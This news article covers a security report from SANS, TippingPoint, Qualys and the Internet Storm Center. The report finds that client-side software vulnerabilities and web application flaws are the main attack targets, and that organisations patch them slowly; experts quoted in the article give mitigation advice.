New Report: Cyber Attacks Exploit 2 VulnerabilitiesMore than Half of All Strikes Target Client-side Software, Websites
This is the main finding of "The Top Cyber Security Risks," a new report based on data from actual attacks against organizations. The report, compiled by security vendors TippingPoint and Qualys, as well as the Internet Storm Center and SANS Institute, finds that client-side software and Internet-facing websites are organizations' greatest - and most overlooked - cyber risks.
Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office, says Alan Paller, Research Director at SANS. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers who have infected visitors via insecure websites, he says.
[Note: For more insights from Paller on cyber risks, listen to this new podcast interview.]
Ed Skoudis, senior security consultant at Inguardians, a risk assessment and security forensics company, urges organizations to radically improve their protection. "Because exploitation of client-side programs such as browsers and media-playing software is such a dominant vector of attack today, organizations need to employ two reinforcing mechanisms to accomplish this," Skoudis says.
The report also offers best practices in mitigation and control of the top risks, as well as a tutorial, analysis of four key attacks, and advice from security experts who urge action to mitigate these critical risks.
How Client-side Exploits Happen
The reason that client-side software is so vulnerable is because the client programs are now the front door through which attackers walk to gain access to the rest of the environment. "Without proper security of client systems, attackers can compromise such systems on internal networks and use them as a jump-off point for complete control within an enterprise environment," Skoudis notes.
Because visitors feel safe downloading documents from trusted sites, they are easily fooled into opening documents and media (music, videos) that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software.
The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations, and also to install back doors through which the attackers can return for further exploitation.
Web Application Attacks
The second critical area where hackers are focusing includes vulnerable Internet web site applications. Attacks against web applications constitute more than 60 percent of the total attack attempts observed on the Internet, according to the report. These vulnerabilities are being exploited widely to convert trusted web sites into malicious sites, serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source, as well as custom-built applications, account for more than 80% of the vulnerabilities being discovered. Most website owners are running scans every quarter, but most those scans look for operating system errors and are ineffective in looking for SQL injection or cross-site scripting flaws.
The Internet Storm Center sees the attacks these hackers are making, says Dr. Johannes Ullrich, head of the center. "We do get a lot of reports of exploited web applications that are then used to reflect attacks to users of the web applications," he says.
In many cases, the web applications are compromised via mass-customized tools that are able to detect and exploit a wide range of vulnerabilities (for example web applications with SQL injection flaws running Microsoft SQL server as a back end, or web applications written in PHP with remote file inclusion vulnerabilities). "These attacks are so successful because users trust these websites and are willing to install software or follow links that are offered by these websites," Ullrich adds.
These attacks also affect millions of systems and are among the most pervasive ways to distribute malware, Ullrich observes, "At the Internet Storm Center, we focus on these large scale attacks. Some of the other attacks mentioned in the report (for example the pass the hash attacks) are not as commonly used, but if they are used they can be very devastating and affect an entire enterprise."
On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities, according to the new report. In other words, the highest priority risk (client-side vulnerabilities) is getting less attention than the lower priority risk (OS vulnerabilities).
Skoudis says organizations need to have a better system for deploying patches to client-side software -- especially third-party programs. "Also, they need to configure their systems so that users log on to systems without local administrative privileges," he adds. Web application vulnerabilities continue to proliferate, acting as a vehicle for client infection or stealing sensitive data.
The shift of attention by hackers also must be recognized, Skoudis says. The battle has moved from targeting traditional network services to a focus on client-side software and web applications. "We can't let our guard down on the other front, however, of traditional network services," he says. "But we can see how much we have to now focus on the big battleground of today."
Ullrich agrees with Skoudis, adding that the automated, large scale exploitation of web applications will continue and become more sophisticated. "These attacks can be mass-customized and launched with simple tools against a large number of systems," he says. "Developers need to prevent these simple flaws in the future, and system administrators need to find better way to inventory and secure these applications in the enterprise."
This report is different from any study done before, says Paller, because it reflects massive amounts of data on the actual attacks (millions of them) and on the speed with which the underlying vulnerabilities are being patched (actual data from thousands of companies).
"The amazing data is that enterprises are prioritizing what is unimportant, and delaying fixing the main attack targets," Paller says. "I think [the report] will shift a lot of money around in a lot of organizations because the findings are very hard to ignore. Given the strength of the data, not acting would be obvious negligence."